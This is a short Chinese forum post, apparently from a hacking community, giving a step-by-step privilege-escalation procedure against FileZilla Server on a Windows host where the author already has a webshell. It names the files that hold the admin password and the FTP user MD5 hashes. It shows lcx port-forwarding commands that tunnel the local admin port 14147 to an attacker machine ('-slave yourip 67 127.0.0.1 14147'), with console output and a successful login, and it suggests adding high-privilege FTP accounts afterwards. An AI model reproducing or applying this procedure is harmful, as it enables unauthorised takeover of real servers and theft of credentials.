我不多打字了,大家仔细看我的操作,现在的服务器上有很多都有filezilla。
shell我已经拿到了
通过读他的注册表获取了路径 软件在注册表中的位置:HKEY_LOCAL_MACHINE\SOFTWARE\
C:\Program Files (x86)\FileZilla Server
FileZilla Server Interface.xml 这个文件中存放密码和端口等信息。
shell可以执行命令。 filezilla提权需要转发端口,这里我使用lcx进行转发端口。
lcx我已经上传了。
C:\HostingSpaces\lisongzh\kejimu.net\wwwroot\msjt\editubb\lc.exe
还需要的就是filezilla客户端软件,我已经安装好了。
之后我们来本地进行监听
命令:lcx -listen 67 6767
shell中使用lcx执行 参数:-slave yourip 67 127.0.0.1 14147
[+] Accept a Client on port 67 from 216.67.248.88 ..
[+] Waiting another Client on port:6767....
端口成功转发来过来。
我们来链接一下看看
已登录 成功登录,之后可以自己添加高权限的ftp了。
最后补充一下:
在FileZilla Server目录中FileZilla Server.xml存放着各用户ftp的密码,是32位md5加密。
到此结束!
(附件)
本帖包含的部分附件只能 访问 社区查看